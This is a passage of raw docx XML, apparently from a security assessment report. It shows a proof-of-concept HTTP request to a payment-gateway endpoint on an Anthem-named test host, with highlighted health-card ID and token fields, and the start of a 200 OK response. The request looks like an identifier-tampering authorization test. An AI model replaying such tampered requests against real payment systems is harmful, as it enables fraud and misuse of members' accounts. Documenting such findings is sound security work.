              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w14:paraId="73849120" w14:textId="77777777" w:rsidTr="00AD5D28">
              <w:trPr>
                <w:trHeight w:val="4054"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="705D1A95" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>POST /paymentgateway/</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gofundhip/secure/v1/gbd/payments/submittransaction</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3ED1CC40" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1195927D" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="322173B8" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4861170F" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>memberpaySubmitPayments</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": [</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4FBE83A6" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    {</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5ACD520B" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">      "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>childHealthCardId</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "751M56029</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="11D14891" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">      "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>planID</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="24D98A9D" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">      "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>paymentAmount</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "$5.99"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="48A77BC1" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    }</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5C438955" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  ],</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="25F86323" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>newPaymentMethod</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": false,</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="450006B6" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>payMetFutureUse</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": false,</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2D0E5B85" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>paymentType</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "BANKINGACCOUNT",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1AD9CA45" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>bankAccountType</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "PERSONAL_CHECKING",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="30318173" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>orgName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "Test",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="763FDE15" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>tokenId</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "RTU2QUEyMzFDN0Q3ODVGRUMzOUMxRTRDQzQxMTktanRyYWNpbmc0OA==M0M3</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0B37CC82" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>paymentDate</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "2019-05-31"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="76AD5AE2" w14:textId="77777777" w:rsidR="00AD5D28" w:rsidRPr="00AD5D28" w:rsidRDefault="00AD5D28" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AD5D28">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3FC070BC" w14:textId="77777777" w:rsidR="00793DD6" w:rsidRPr="00793DD6" w:rsidRDefault="00793DD6" w:rsidP="00AD0973">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00793DD6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00793DD6" w:rsidRPr="00793DD6" w14:paraId="5994472C" w14:textId="77777777" w:rsidTr="00793DD6">
              <w:trPr>
                <w:trHeight w:val="1467"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="54B1BCBB" w14:textId="77777777" w:rsidR="00793DD6" w:rsidRPr="00793DD6" w:rsidRDefault="00793DD6" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="41A22302" w14:textId="77777777" w:rsidR="00793DD6" w:rsidRPr="00793DD6" w:rsidRDefault="00793DD6" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Fri, 31 May 2019 18:56:20 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0425CBBD" w14:textId="77777777" w:rsidR="00793DD6" w:rsidRPr="00793DD6" w:rsidRDefault="00793DD6" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3905B421" w14:textId="77777777" w:rsidR="00793DD6" w:rsidRPr="00793DD6" w:rsidRDefault="00793DD6" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 151</w:t>
                  </w:r>
                </w:p>
